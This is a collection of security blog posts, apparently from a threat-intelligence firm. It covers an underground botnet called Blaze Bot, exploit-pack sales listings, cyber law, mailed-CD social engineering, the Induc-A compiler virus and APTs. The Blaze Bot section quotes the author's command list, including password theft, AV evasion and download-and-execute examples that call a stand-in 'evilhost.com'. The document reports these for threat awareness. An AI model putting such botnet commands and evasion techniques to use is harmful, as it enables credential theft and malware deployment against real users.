Blaze Bot
Just as traditional security vendors have and continue to offer limited licenses hoping that the limited functionality presented would entice the prospective user to pay for the fully licensed product, so to are underground vendors of malicious code and content. Take for example the case of the Blaze Bot. Blaze Bot’s author, known in the underground as SqUeEzEr asserts that this will be a bot to watch and as such has been kind enough to offer the following explanation of the bot, it’s promised features and functionality and potential means of gaining access to it; one of which is a try and buy option.
Word of the Blaze Bot came within the last month. It’s author, presumably makes his home in the Netherlands and has offered the underground quite a bit of information regarding the bot, and it’s intended use. Take a look at what he promises it can do:
Description:
Product Info:
Blaze Botnet™
With Blaze Botnet™ you can create your own network of computers by linking them to the web based user interface.
The bots won’t connect to your personal computer, but to the web server, making tracking down to the owner extremely difficult.
The bots will connect to the site each minute to get your commands.
The bots will execute your commands and notify the results to the web interface.
Features:
Technical Info
Bot Info:
Bot’s will copy themselves to a special place in your system. From thereout, they will use ActiveX startup to maintain the startup.
The Bots first check for sandboxes, then startup their main core in such a way, no emulator can compete.
Then they will load up an special exception handler and create a critical system process.
The bot will then hook the windows shutdown event, to make sure to shut down their process propperly at shutdown.
Also, they will unhook all usermode API hooks in their own process at each run. Also they delete their PE header in memory, so they can’t be dumped.
As a last thing, the bots are PURE code and have no forms. To connect to the web interface, they use Pure API.
The bot’s executable is ~70 KB’s uncompressed.
The Builder does NOT use EOF, but patches a crypted string inside the file.
Command List:
Command list
All commands consist out of 4 characters with optional parameters.
Commands:
- Nick
With this commands you can specify unique bots that will execute your command.
You should type ‘nick’ and then their username and then the command.
Example: ‘nickshadowbsod’ will let the bot named shadow have a Blue Screen of Death.
- Wser
With this command you can let the bots send their Windows Serial Key to the web interface.
- Avfw
When a bot executes this command, it will output the exact name and version of the Antivirus/Firewall to the interface.
- Down
With this command you can make your bots download and execute a file of your choice.
The bots will download the file with pure api and they will dump it in the same directory as the bot is installed in.
Example: ‘downhttp://www.evilhost.com/virus.exe’ will download and execute ‘virus.exe’ from ‘evilhost.com’.
They will automatically execute the file if it’s an exe, and load it if it’s a dll.
- Exec
This command makes a bot execute a file.
Example: ‘execC:\windows\explorer.exe’ will execute ‘explorer.exe’.
- Msnp
With this command you can make the bots find, decrypt and steal all the stored MSN passwords on it’s computer.
- Info
This will simply output the username of the bot, the computername and the country it’s located in.
- Bsod
‘Blue Screen Of Death’ or in short: CRASH.
- Upda
With this you can specify that the servers need an update.
You can do that by specifying a new version number and a url where to download the update.
Example: ‘upda1.2http://www.evilhost.com/update.exe’ will make any version lower than 1.2 download the update package ‘update.exe’ from ‘http://www.evilhost.com’.
- Dump
This commands will make the bots report their passwords to a file on this server, wich will save them to a nice list.
Examples:
-dumpmsnp
-dumpwser
-dumpavfw
-dumpinfo
-dumpfzil
- Pivy
This will spawn a Poison Ivy Server on the remote computer, wich you can let connect to you.
Example: PIVY192.168.1.100
This will let the server connect to 192.168.1.100 on the default port.
The Poison Ivy server will be loaded in the same process as the Bot, ultimate stealth.
- Kivy
If poison Ivy was spawned, but you want it to stop; use this command.
This commands will make the bots report their stuff to you by email.
Examples:
-mailmsnp
-mailwser
-mailavfw
-mailinfo
-mailfzil
- Exit
Exit the current process, until the computer is rebooted.
- Melt
This will uninstall the server, quietly…
- Unhk
With this command, the bot will analyse itself to find api hooks. If it finds that it is hooked, it will unhook it.
Most api hooks are from firewalls and antivirus programs.
It will restore all Usermode (ring3) api hooks.
- Sset
This is some new implented stuff. The bot has it’s own patching function, which allows you to patch values that are hardcoded.
You can edit stuff like Hostname, script path etc. The bot will patch it’s own binary, with the new values.
Examples:
-ssethost
Set another host. “ssethostgoogle.nl” will set “google.nl” as host.
-ssetemfr
Set another email FROM address.
-ssetempa
Set another email password.
-ssetemto
Set another email TO address.
-ssetpath
Set another script path.
-ssetcomm
Set another commander name.
- Patc
This command will patch the new values set by SSET in the bot’s file.
Example:
SSETHOSTgoogle.nl
SSETPATH/new/
PATC
That will patch your bot so that it will connect to “google.nl/new/” from now on.
- Rset
Made a typo in the SSET command? No problem, this command makes a fresh start with old settings.
- Fzil
This will steal the stored FileZilla passwords.
Screenshots:
Builder:
It is unclear at the time of this writing whether or not the author decided on his method of propagation however information gathered in with respect to Q&A conducted in the underground suggests that the bot’s intent is not to DD0S (he has been cautioned about the legalities and attention such functions bring) but that he is planning on integrating a rootkit and perhaps polymorphism into the framework. Additionally, all communications are to be encrypted which suggests this will be a classic ‘bot service’ vehicle, intent on delivery of malicious code and content. Speculation abounds with respect to the costs however it has been suggested to the author that it could be sold for as much as $400.00 due to the sheer functionality (password harvesting which it is thought will attract consumers). Furthermore, it was suggested to the author that he publish a free version with limited functionality (sound familiar?). We here Cassandra Security will continue to monitor the rise and eventual distribution of Blaze Bot. It is on our radar and likely others. For more information please contact www.cassandrasecurity.com
Like most of my peers in the information security space, I’m a busy guy. I tend to multi-task and as such often manage multiple projects with multiple deadlines for multiple purposes and ends. It’s fair to say that I enjoy being both creative and busy. Last night as I was doing some research I realized that I had received the latest edition of the ISSA Journal (August 2009, Volume 7 Issue 8). On it’s cover was a dramatic looking illustration of an Apache helicopter with the cover story’s headline embossed upon it: ‘A Global Problem: Cyberspace Threats demand an international approach’. The article was written by Maj.David Wilson, an active duty lawyer in the United States Army who has spent the last ten years providing legal advice to the United States Army in the areas of cyber and international law, amongst other areas.
Maj. Wilson hit on a few key points which I believe anyone with any intellectual honesty (who is well versed in information security and the international perspective associated with it’s monitoring & governance), would agree with:
- It is extremely difficult to define “international cyberspace” as there are no defined national borders or neutral zones thus the need to define it’s existence
- Upon defining it, only then can certain portions of it be deemed truly “international” and therefore subject to international law
I agreed with Maj.Wilson’s assertions in and around this point as they echo the sentiment of many commissions and legislative bodies (both here and abroad), as well as many other authoritative voices with respect to the subject matter. Maj. Wilson goes on to expand on how some nations have enacted laws with respect to cyberspace but that none of them extend to other nations nor are they in alignment with one another. Maj.Wilson cited the proactive stance which some nations have adopted such as those seen in Europe in the form of activities taken in 2001 with the establishment of the Council of Europe Convention on Cybercrime. I was pleased to see he cited this as I’ve presented on this proactive, collaborative ideology in the past and feel there is merit in it and the spirit with which it was authored. Additionally he cited both key NATO initiatives and the CCDCOE.
As I continued to read through Maj.Wilson’s I was equally pleased to see his inclusion a reference to Article 2(4) and Article 51 of the United Nations Charter. Article 51 states the following:
” Nothing in the present Charter shall impair the inherent right of individual or collective self-defence if an armed attack occurs against a Member of the United Nations, until the Security Council has taken measures necessary to maintain inter- national peace and security. Measures taken by Members in the exercise of this right of self-defence shall be immediately reported to the Security Council and shall not in any way affect the authority and responsibility of the Security Council under the present Charter to take at any time such action as it deems necessary in order to maintain or restore international peace and security.”
According to Maj.Wilson’s interpretation of these articles, questions of a nations right to defend itself under these articles are not relevant unless a cyber-event can be determined. Having read the articles cited by the Major, and other academic papers on the matter I tend to agree with him however the real challenge which I see here is that which rests squarely in being able to determine without question those parties responsible for a given cyber-event and the point of origin. The articles were drafted with sovereign nations in mind and do not take into consideration the potential or possibility of sub-national entities being responsible for said events. Sub-national entities might include cyber-criminal syndicates (which often operate in mercenary roles on behalf of paying customers public or private) and / or terrorist organizations such as al Qaeda.
Though I believe that there is a a clear and present danger facing the cyber frontier I am not convinced that the establishment of international cyberspace is realistic largely because “cyberspace” is not a singular entity or infrastructure. In Major Wilson’s article he points to the ITU and ITC as excellent models for governance standards and architectural oversight of international cyberspace. He goes on to cite the ITU / ITC’s Articles 19 and 20 which describe a nations right to suspend communications (telecommunications — in general or on a discretionary basis) indefinitely provided the nation in question provides notification to each of the other members through the medium of the secretary general. Given the way in which the articles are written it could be argued (though it is not clearly defined as anything beyond telecommunications networks), that a nation might have the right to defend itself similarly against a violation occurring in “international” cyberspace.
There are several questions that came to mind after reading this piece by Maj.Wilson. Many which require both thoughtful reflection and time. Certainly any intellectually honesty cyber security professional would agree that the need to defend nations and individuals; to provide protection against threats (foreign and domestic) is important and good. The mechanics of arriving at a place where this is easily delivered is less simplistic. Furthermore the question of counter offensive cyber initiatives (and their associated) ethics must be taken into consideration when contemplating the various means by which one might arrive at a place where both being able to protect and defend is clearly defined and supported by international law. The reality is that today, this is asking a lot to say the very least. Nations are sovereign and to that end, will act (just as we saw in Iran during the recent election hype), as sovereigns. We must be careful and judicious with our use and ad-vocation of levying an international precept for the governance of cyberspace but certainly not ignorant of the pros and cons of not doing so.
Sometimes, things are not as they seem
Yesterday, I posted a blog entry on what seemed at the time to be a very serious intrusion attempt into several credit unions around the US, using mailed CDs containing malware as an infection vector. Of course, things aren’t always as they seem, and that was the case with the incident I posted about yesterday. Security firm Microsolved posted an entry to their blog earlier today, telling the other side of what turned out to be a really interesting story. As it turns out, the mailed CDs were part of an authorized penetration test, and a lot of people, myself included, jumped to conclusions on this. In fact, that this pentest received the kind of publicity that it did was actually evidence that security procedures were actually pretty good: Someone got the malware-laden CD in the mail, their BS detector went off, and they sounded the alarm. The security folks at the bank alerted the NCUA that someone was using their name for malicious purposes, and the whole thing snowballed from there.
It’s a bit ironic, actually: yesterday, my friend Adam Hils posted an entry to his blog on Occam’s Razor, and it’s corollary, Hanlon’s Razor. Hanlon’s (or Heinlein’s) Razor is the principle that one should never ascribe to malice what could be otherwise explained by stupidity. After reading this, I’ll propose a corollary to that - In the absence of compelling evidence to the contrary, stupidity or malice should be the last things you suspect, not the first. Feel free to call it Amato’s Razor, but somehow I don’t think that’ll catch on.
Familiarity Breeds Contempt
Familiarity breeds contempt. This saying has its origins in one of Aesop’s fables. It’s a classic story where a fox sees a Lion, becomes filled with fear and runs away to hide himself in the wood. The next time he saw the Lion, he allowed himself to get closer to him, stopped at a safe distance and watched him pass by. The third time they came near one another the Fox went right up to the Lion and began chatting with him, asking about life, his family and the next time he’d be seeing him. After finishing his discussion, he turned and left the Lion without much ceremony. In life and in business, we see this often. In our specific discipline it is my opinion that we see this so often that it encourages desensitization and an artificial sense of security.
I see this most often when speaking to executives who have read about threats which have not yet touched their environments or when speaking to enterprise security professionals who focus exclusively on one mitigation tactic, technique or technology. In some of these conversations it becomes clear that because they’ve “seen the Lion” so often they no longer fear its roar and as such do not fear the roar of other Lions. Recently I gave a talk on the evolution of threat landscape, the cyber criminal elements at play therein and botnets. The audience was receptive and entertained. Many had never heard the information being presented before while others had and were more noticeably contempt towards the message. I never take that sort of thing personally as I feel you can learn from all experiences good or bad. In this case however it became clear that some of the folks in attendance were still quite fearful of the “Lion” (in this case Botnets), while others held a contemptuous attitude towards them.
I think there is a lesson to be learned for all of us here. I believe anyone can fall prey to this attitude if allowed to do so and as such place themselves and others at risk. Within our discipline, the study of the art & science of information security, malware, malcode, botnets etc. it is our responsibility to keep ourselves and each other on point with respect to a healthy sense of fear so as to avoid the folly seen in those situations where familiarity breeds contempt.
Perimeter? What perimeter?
This came across my feed reader this morning, and I thought it was interesting. It’s yet another example of how the traditional notion of “the perimeter” doesn’t really exist any more. In this case, attackers were able to infect machines at a few small credit unions, simply by sending CDs in the mail that appeared to be from the National Credit Union Association. All the “traditional” infection vectors go out the window here: These machines weren’t infected by an email payload, or from a malicious website, or from a software or operating system vulnerability. All the network protection in the world wouldn’t have helped here, because NOTHING went over the network prior to infection. In fact, this is a really “old-school” way of disseminating malware – it’s the 21st century equivalent of a virus being passed around on an infected floppy.
So, what might have helped?
First and foremost, well-managed and well-monitored antimalware with a good, solid signatureless detection engine, running on each and every endpoint. To quote my friend and colleague Josh Corman, trying to write a signature for a targeted attack like this is like giving a vaccine to a corpse – by the time the signature is written and deployed, the damage is long since done.
Secondly, user education and training might have also helped here, to a degree. The users who blindly ran the infected CDs were gullible, plain and simple. A user with a well-tuned B.S. detector is your best defense against social engineering attacks like this one.
Third: desktop lockdown – 90% of corporate PC users have no job-related need whatsoever for their CD drive – so WHY do they have CDs available for use? There are plenty of enterprise-manageable software tools available to disable removeable storage – use them.
The credit unions that got hit with this were NOT sitting ducks, and you don’t have to be either. You CAN defend yourself against social engineering – you just need to be proactive about it.
My Security is Good Enough…Really?
I wonder…would you fly on an airplane if the engines were “Good Enough”? Would you feel safer going through airport security if the metal detectors were “Good Enough”? Better yet, I’m about to have brain surgery and my neurosurgeon mentions that his education was “Good Enough”…I think you might start getting my point. The good enough/checkbox security mentality can be dangerous if your just wanting to do the bear minimum to pass your PCI-DSS audits or whatever regulatory compliance you have to adhere to. Even without regulatory compliance, your stance on security should be taken seriously. However, how can you take it seriously if you don’t understand the threat landscape? To some having a firewall, IDS (Passive Mode Only) and anti-virus seem to be enough and that’s true if this was the late 90’s early 00’s.
Viruses and web defacements were par for the course back then. For example, names like “Code Red”, “Nimda”, etc where commonly known. Today, DDoS (Distributed Denial of Service), SQL Injection, Cross-site Scripting, Malware and Botnet’s to name a few are taking center stage. Why are these specific classes of attacks and more specifically, the use of the Web browser and Web applications becoming the key vector of exploitation? A lot has to do with the rapid growth and adoption of the Internet as a key utility for commerce, learning and playing. John Chamber’s really captured it in the following quote; “Changing the Way We Work, Live, Play and Learn.” That change has introduced innovated technologies that have increased 3 key attributes:
- Access: Internet, remote office, home office/café, always on, everywhere
- Convenience: Wireless, IaaS, SaaS, MSSP
- Efficiency: Web enabled App’s, Virtualization
Today’s infrastructures are complex, dynamic and constantly changing. The perimeter of the 90’s and early 00’s was well defined and so was the protection. We are dealing with a “floating perimeter”. A floating perimeter is one that is not just confined to the physical corporate infrastructure but also includes smart phones, wi-fi, home offices and café’s. How do you protect your infrastructure from the growing Web threat? First, you need to understand the threat landscape, how much risk your willing to take and more importantly…economics. The cost of security is an entirely different topic and I will cover in depth in a forthcoming post. To illustrate my point on the threat landscape I did the following. In recent conference I presented at, I spoke about the evolving threat and securing next generation networks. Before I started asked 2 questions.
- How many do causal web surfing or use the web to conduct business? As expected, everyone raised his or her hand.
- How many have virtualization projects in flight? About half the audience raised his or her hand.
After going through my presentation that covered specific virtualization and web threats, the audience was amazed that there infrastructure could be penetrated from the outside in…meaning through their web browser. Now this is just one vector of attack as there are many vectors. It just so happens that the increase in client side/server side attacks are off the map with the respect to the amount of publicly disclosed vulnerabilities.
Securing your infrastructure can be a small task depending on your size but if you have an infrastructure that spans multiple continents…were do you start? Do I have the right security in place? I often get asked this question and depending on the infrastructure, business vertical and geographic location, the answer is complex but can be answered. I was asked by a CSO once, “if you were me, what key security assets would you absolutely have on your network”? Not having all the information in front of me i.e.; Security Policy, Infrastructure diagram and other various key pieces of information, I gave him the following answer. Based on what I know about the threat landscape and certain regulatory compliance your organization must follow, I would recommend the following: Deep Packet Inspection (DPI), Network Behavioral Analysis (NBA), Some form of Access Control and Segmentation, Application Layer Content Analysis, Distributed Denial of Service Protection, Identity Access & Management and some form of End-Point Security. Then I would identify what I call “High Value Targets” on your infrastructure such as; Web Farms, Data Center and users that have access to sensitive corporate information and make sure these were highly secured…then work my way down. However, I would also perform an analysis of the current security technologies and optimize them so they are being used at their peak performance. This will help set an infrastructure wide security strategy and allow you to manage the cost of security. Ubiquitous security across your infrastructure can be costly.
Lastly, I would research all the security technologies that have had some form of independent testing. As a CSO, you really want two things…keep me up (the network/infrastructure) and keep me out of the papers. So the quesiton remains…is my security good enough and reasonable? It just might be…but education and awareness is key. Where can you learn more about the current threat landscape? Please check out the following link: http://tinyurl.com/cepgyw or check out some of the postings on Cassandra…the Internet is amazing above ground…just take a stroll into the underground World of the Internet…trust me it’s not pretty…the threats are real and highly profitable and it’s up to the security community to keep you informed and one step ahead.
The above comments are strictly mine and mine only, they in no way reflect the position of my employer, management or any other organization with which I’m associated.
Give Me Liberty or Give Me Yes!: These Prices Are Insane
Trojans are tricky. For a brief period of time (a few years back now), they were written off and believed to be trivialities; easily detected, easily dealt with and largely sooooo 2001. It would’ve been fool hardy to totally dismiss the Trojan as both a convenient and effective means of distributing malicious code and content and that is why security researchers of all denominations (blackhat, whitehat, grayhat – remind me to expand upon my feelings of grayhats at a later date), never did. The reality is that Trojans are as popular in the underground and as much en vogue (perhaps more so), today as they were ten years ago.
Trojans and exploit packs associated with Trojans, are quite easily obtained, assembled and had for what could be argued as minimal investments when the potential revenue to be had from their use is taken into account. Take for example the following Trojan and exploit packs currently being discussed within the underground. You’ll note the following about each:
- Detailed explanation of the associated / included exploitations (and if perhaps the vulnerability related data)
- Price
In other posts, I’ve discussed the movements and evolutions in the underground with respect to cybercrime and crimeware as a service (CaaS). The following information represents examples of both while additionally breaking down each pack (and value added services associated with / provided by the given vendor).
Unique Pack Sploit
latest: v.1.5 (0331)
exploits:
[+] modified Mdac for IE6
[+] Pdf (v.8.1.2 05.01.08) – new Pdf sploit for IE7, Opera & FF
[+] Adobe Acrobat 9 Exploit – new sploit (11.09.08)
[+] Pdf Double – two Pdf sploits
[+] Ms Office Snapshot – for IE6 and IE7
[+] Ie 7 XML Spl – new sploit for IE 7
[+] FF Embed – for FF <= 3.0.5**
[+] IE 7 Uninitialized Memory Corruption Exploit – new sploit for IE7 (18.02.09)
[+] Spl Amaya 11 – for Amaya 11
[+] Foxit Reader 3.0 (Build 1301) PDF Buffer Overflow Exploit (Universal) – all browsers
price: 600$
Notes on Unique Pack Sploit: Blended attacks & exploits with heavy emphasis on browser security weakness. Additionally, you’ll note exploits using MS Office and structured data formats.
YES Exploit System
latest: 1.2.0
exploits: alot. good crypted
price: 700$
Notes on YES Exploit System: Lots of buzz around this but not alot of detail; more research is required with respect to exploits and associated vulnerabilities . The authors (vendors) suggest its full of solid exploits and contains a crypto-pack.
Neon exploit system
latest version: 2.0.5
exploits:
- IE7 MC;
- PDF collab;
- PDF util.printf;
- PDF foxit reader;
- MDAC;
- Snapshot;
- Flash 9;
price: 400$, minor updates – free
Notes on Neon Exploit System: Fair number of exploits associated with this pack. Mainly targets Adobe vulnerabilities however the authors also include MDAC, MS Office Snapshot and a Flash exploit for good measure. Additionally, the vendor offers maintenance — scary right?
Nuclear
exploits:
MDAC – ie5, ie6
Snapshot – ie6, ie7
PDF Collab.collectEmailInfo – all browsers
PDF Util.printf – all browsers
PDF Collab.getIcon – all browsers
XML – ie7, ie8
MS09-002 – ie7, ie8
price: 900$
Notes on Nuclear: First off, it’s the most expensive of those discussed thus far, however the vibe in the underground suggests it’s quite effective. This remains to be seen in testing. You’ll note many of the same exploits (or promised exploits) present within this pack as in others with a few additional Microsoft exploits thrown in, specifically those targeting IE vulnerabilities.
Liberty Exploit System
latest: 1.0.5
exploits:
MS06-014 Internet Explorer (MDAC) Remote Code Execution Exploit
PDF util.printf(), PDF collab.collectEmailInfo(), PDF collab.getIcon()
Flash 9
MS DirectShow
Snapshot
Java 0day
price: 500$
Notes on Liberty Exploit System: From a blended malware exploit pack offering perspective it’s interesting. It combines may exploits targeting many potential system & application vulnerabilities. It’s getting a great deal of buzz and the authors are quite insistent that it’s effectiveness is indisputable.
The above is a statistical representation provided by the vendors to demonstrate the effectiveness of their tool. This particular shot demonstrates specifics regarding unique instances of exploits, downloads and success ratios in terms of percent.
My point in sharing this information on this blog is twofold:
- To educate those tasked with stewardship of enterprise environments & themselves
- To implore the industry to not dismiss the seriousness of the challenges and parties responsible for these threats
The seriousness of these threats and like threats, are growing and subsequently challenging professionals and amateurs alike. It is crucial that we prepare ourselves for the challenges ahead.
What is old, is new again
I read an interesting report this afternoon from Graham Cluley at Sophos on how applications are turning up all over the world infected with the Win32/Induc-A virus. Sophos’s investigation turned up a rather unique infection vector: it appears from their analysis that this new nasty doesn’t attempt to attack existing executables or application data files. Instead, Induc-A attacks in a very different way: by inserting itself at compile-time into Delphi applications being compiled on an infected machine. It’s a direct attack against the compiler.
Now, this concept isn’t really new. Ken Thompson saw this coming 25 years ago, and talked about it at length in his Turing Award lecture, entitled Reflections on Trusting Trust. In that paper, Thompson posited that “You can’t trust code that you did not totally create yourself.” Thompson’s paper goes on to demonstrate that a backdoored compiler could, in turn, infect every program compiled with it, and, in fact, re-insert itself into a non-backdoored version of the source code of the compiler itself!
So, what does this mean for us? Not much, yet. Induc-A doesn’t really do much other than self-replicate. It’s an interesting proof-of-concept, though, and it may signal another round in the escalating attack/counterattack AV arms race. As far as I know, there are no AV products that check source code or compilers. My best guess right now is that as a result of this, we’ll start to see source-code and compile-time checks sold as a feature in either existing products or perhaps a new, dev-specific AV product.
Malicious Code & Content and The Second Labor of Hercules
The fight against modern malicious code and content often reminds me of the story of Hercules 12 Labors. It was the second task given to Hercules, defeat of the Lernaean Hydra, which always amazed me. Hercules went to the swamp in which the beast lived, and waited for the opportunity to address it much like information security professionals do after spending time and energy preparing to engage their adversaries. The beast proved to be a serious challenge due to it having a huge body and multiple heads which when decapitated, regenerated (polymorphic hydras? metamorphic hydras?) only to come back with more rage and fury than the previous one. It wasn’t until Hercules took some time (and advice from his nephew), that he realized he the best way to defeat the Hydra was to understand the beast comprehensively. His nephew (possibly at the behest of Athena) suggested using firebrands to cauterize the wounded stumps where from which a head had been removed in order to prevent the regeneration of the head. Once Hercules put that plan into action the game changed significantly and he was able to address not only the heads (exploits, payloads etc.) but also the body (vulnerabilities in posture and environment) and move on to the next challenge.
I believe there is much wisdom in this tale of Hercules and the Lernaean Hydra. Lessons which information security professionals, regardless of their particular bent or focus can benefit from:
1) Pay attention to detail — As Hercules removed head after head he failed to initially notice that there were ways to address and stop their regeneration due to being caught up in the heat of battle. Take the time to assess the situation and examine all detail in an exhaustive manner.
2) Seek the Counsel of Your Peers –No one knows everything, not even the son of a god such as Hercules, and as such he decided to listen to the advice and counsel of his nephew which proved to be game changing. Never discount the potential or possibility that someone, anyone can provide a game changing insight and trigger a chain of events that legends are born from.
3) Never Give Up — This is self-explanatory however in the story of Hercules and the Hydra he could’ve easily retreated and gone off to some other land. He didn’t though in order to atone for a crime he’d committed and because quitting wasn’t his style — don’t let it be yours either when faced with what look to be insurmountable odds.
4) Finish the Job — Hercules knew the importance of ensuring the job was done and done right. Upon cleaving the last head, legend tells us he destroyed the body. In essence he finished the job and created his own version of a root cause analysis which he’d later report to his cousin the king.
Next time you’re facing a new and exotic threat or piece of malicious code or content remember Hercules and the Hydra; there is always a way and victory is generally closer than one might think should one take the time to look.
Advanced Persistent Threats & Designer Malware 101
Advanced Persistent Threats and Designer malware have always intrigued me. Their presence both fuels and steels my resolve with respect to what I do and why I do (though they are certainly not the only reasons behind what & why I do what I do). They echo a message which I feel needs to be echoed and championed from high atop the ivory tower of the security industry: we are up against innovative, creative foes who are in some cases just as smart and well equipped as we are and we had better change our ways or prepare for serious repercussions.
Of course, not all APTs (Advanced Persistent Threats), have historically, delivered a malicious payload. However, as in epidemiology, there is always a patient ‘zero’ It’s worth noting however that some of those which have been publicly addressed and disclosed have had a profound (or perhaps more correctly should have had), impact on how our industry views the threat landscape and the cyber-crisis we face on a daily basis. In April of 2008 Business Week ran an article which addressed APTs in brief. For the uninformed, the article evoked a wide array of responses. For those who’ve been in the trenches campaigning against these threats as active participants, defending against the global cyber-siege or who’ve made it their mission to educate the masses, these were all too familiar. Debates rage in the community as to what is the best way in which to combat these threats: is it solely a product issue? a process issue? a people issue? My assertion is that it is all of the above but that even when an organization believes it being ‘diligent’ some observing ego is in order to ensure that the risk posture is both understood and the results of this comprehension actionable.
I was recently asked about what I would recommend to an organization which had found itself the victim of APTs. My response was long 
In short, I suggested that a comprehensive and exhaustive enterprise security assessment complete with interviews, policy review, penetration tests, configuration reviews, and fully qualified forensic analysis /incident response would be a good place to start. Some might argue that my suggestion is a bit much and could be cost prohibitive, my retort would simply be: what value do the stakeholders tasked with stewardship place on delivering the highest degree of security and can you put a price on the piece of mind gained from these types of initiatives especially when dealing with an environment which has been comprised? It’s not an easy question to answer but then again, in life very rarely have I found most truly impactful ones to be so.
Similarly, I feel that like other examples of CaaS (Crimeware as a Service), designer malware are becoming more prevalent and as such being leveraged with much more success. In many cases what makes these threats so dangerous is that the couture associated with them is unique and tailored to order. The implication being that there is a level of cognition and familiarity with the environment, people and / or systems which the designer code will exploit in order to meet the ends of the wielder. Truly, truly insidious stuff.
Sun Tzu
In both instances, whether speaking of APTs or designer malware, creativity, innovation and stealth are integral to the success or failure associated with these threats. In many cases the code in question is intelligent enough to detect and bypass malware detection solutions and subsequently disable them if they are empowered to do so. In some cases, the code is robust enough to survive reboots and often times thanks to energy saving initiatives which encourage employees to leave their systems powered up, and self-propagation techniques which encourage the cycle of infection – reinfection the code lives on unfettered. Other techniques commonly associated with threats of this nature include hiding processes, hiding services, incorporation of covert channels, hidden modules and a whole host of other problematic goodies which both frustrate and infuriate many a good guy. This is not to say that these threat cannot be combated and prevented but rather that in order to do so, one must understand, as Sun Tzu argued centuries ago, proper strategy for success in combat requires a fundamental understanding of ones enemy. This sounds simplistic but were it truly so, my belief is as an industry we would focus more on treating the patient and not simply the symptom. In doing so, I believe we’d encourage a healthier state (much the way a physician does when prescribing diet / proper nutrition, exercise and medication), rather than simply reaching for pharmaceuticals.
